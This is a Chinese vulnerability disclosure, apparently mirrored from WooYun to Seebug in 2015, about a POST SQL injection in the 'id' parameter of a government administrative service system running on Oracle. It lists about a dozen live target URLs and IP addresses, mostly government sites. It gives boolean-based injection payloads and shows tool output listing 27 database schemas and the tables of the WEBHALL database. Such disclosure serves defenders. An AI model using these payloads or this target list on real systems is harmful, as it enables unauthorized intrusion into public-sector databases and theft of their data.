某gov行政服务系统Oracle数据库搜索型POST注入

2015-03-10T00:00:00
ID SSV:95806
Type seebug
Reporter Root
Modified 2015-03-10T00:00:00

Description

简要描述:

RT

详细说明:

排除该套系统其它注入点: WooYun: 某大型政府服务系统Oracle注入(使用量大) WooYun: 某Gov行政中心系统Oracle注入漏洞(使用量大) 此处是一个POST注入,存在注入地方:spjggsQuery.do?method=busiinfoquery POST参数id存在注入

<img src="https://images.seebug.org/upload/201503/10173608deee9075d2b7c3cdfe182a0376e06a8e.png" alt="0310_12.png" width="600" onerror="javascript:errimg(this);">

wooyun还没人提交,抢先。。如图:

<img src="https://images.seebug.org/upload/201503/101737010dcbef8168afb80e60e5a06512028130.png" alt="0310_11.png" width="600" onerror="javascript:errimg(this);">

按照通用程序标准(十个以上案例+演示),部分案例如下: http://119.1.108.246/spjggsQuery.do?method=busiinfoquery http://jc.dlxg.gov.cn/spjggsQuery.do?method=busiinfoquery http://202.97.172.24/spjggsQuery.do?method=busiinfoquery http://www.tlsp.net/spjggsQuery.do?method=busiinfoquery http://hxasc.cn/spjggsQuery.do?method=busiinfoquery http://jc.dlxg.gov.cn/spjggsQuery.do?method=busiinfoquery http://jjjc.sqxz.gov.cn/spjggsQuery.do?method=busiinfoquery http://www.yjxzfw.com.cn/spjggsQuery.do?method=busiinfoquery http://www15886.edu6.org/spjggsQuery.do?method=busiinfoquery http://www.pjdzjc.gov.cn/spjggsQuery.do?method=busiinfoquery http://58.42.229.238/spjggsQuery.do?method=busiinfoquery http://61.189.156.73/spjggsQuery.do?method=busiinfoquery ... 暂时就先统计这么多。。。 演示见漏洞证明

漏洞证明:

拿一个案例进行演示: http://119.1.108.246/spjggsQuery.do?method=busiinfoquery POST数据:

id=61161&permname=&dwmc=

访问正常,如图:

<img src="https://images.seebug.org/upload/201503/101746173e3f18da23f030bbb9baf06196f303ff.png" alt="0310_14.png" width="600" onerror="javascript:errimg(this);">

POST数据(条件为真):

id=61161' and 'a'&lt;&gt;'a&permname=&dwmc=

访问正常:

<img src="https://images.seebug.org/upload/201503/1017442330a4d6528a9ea5f624b1b5bbde2aa8b0.png" alt="0310_12.png" width="600" onerror="javascript:errimg(this);">

POST数据(条件为假):

id=61161' and 'a'='a&permname=&dwmc=

无数据:

<img src="https://images.seebug.org/upload/201503/10174537e12855365065872df8f99fa4f073f596.png" alt="0310_13.png" width="600" onerror="javascript:errimg(this);">

直接上工具:

<img src="https://images.seebug.org/upload/201503/10174658c4afc0d7cad0f96dab33cc4176f08298.png" alt="0310_10.png" width="600" onerror="javascript:errimg(this);">

数据库:

<img src="https://images.seebug.org/upload/201503/1017534338e1f9578ec7401205f4de70502a254b.png" alt="0310_15.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/10180002f19a2feb1bfe2094ee88ce22fe170c85.png" alt="0310_16.png" width="600" onerror="javascript:errimg(this);">

available databases [27]: [*] CTXSYS [*] DATASWAP [*] DBSNMP [*] DMSYS [*] EXFSYS [*] HR [*] IX [*] JEECMS [*] MDSYS [*] OE [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PM [*] QXN_TYSP [*] QXN_WEBHALL [*] SCOTT [*] SH [*] SYS [*] SYSMAN [*] SYSTEM [*] TSMSYS [*] TYSP [*] TYSP_SYSTEM [*] WEBHALL [*] WMSYS [*] XDB

表信息:

Database: WEBHALL [18 tables] +--------------------------+ | T_DJL | | T_WEBHALL_BGXZ | | T_WEBHALL_CJWD | | T_WEBHALL_FLFG | | T_WEBHALL_FLYJ | | T_WEBHALL_FRIEND_CONN | | T_WEBHALL_MENU | | T_WEBHALL_MENU_USERGROUP | | T_WEBHALL_NEWS | | T_WEBHALL_NEWS_CONTENT | | T_WEBHALL_RESEARCH | | T_WEBHALL_SPMANAGER | | T_WEBHALL_TSPL | | T_WEBHALL_USER | | T_WEBHALL_USERGROUP | | T_WEBHALL_USER_USERGROUP | | T_WEBHALL_ZRXX | | T_WEBHALL_ZRXX_REVERT | +--------------------------+

数据不跑了。。。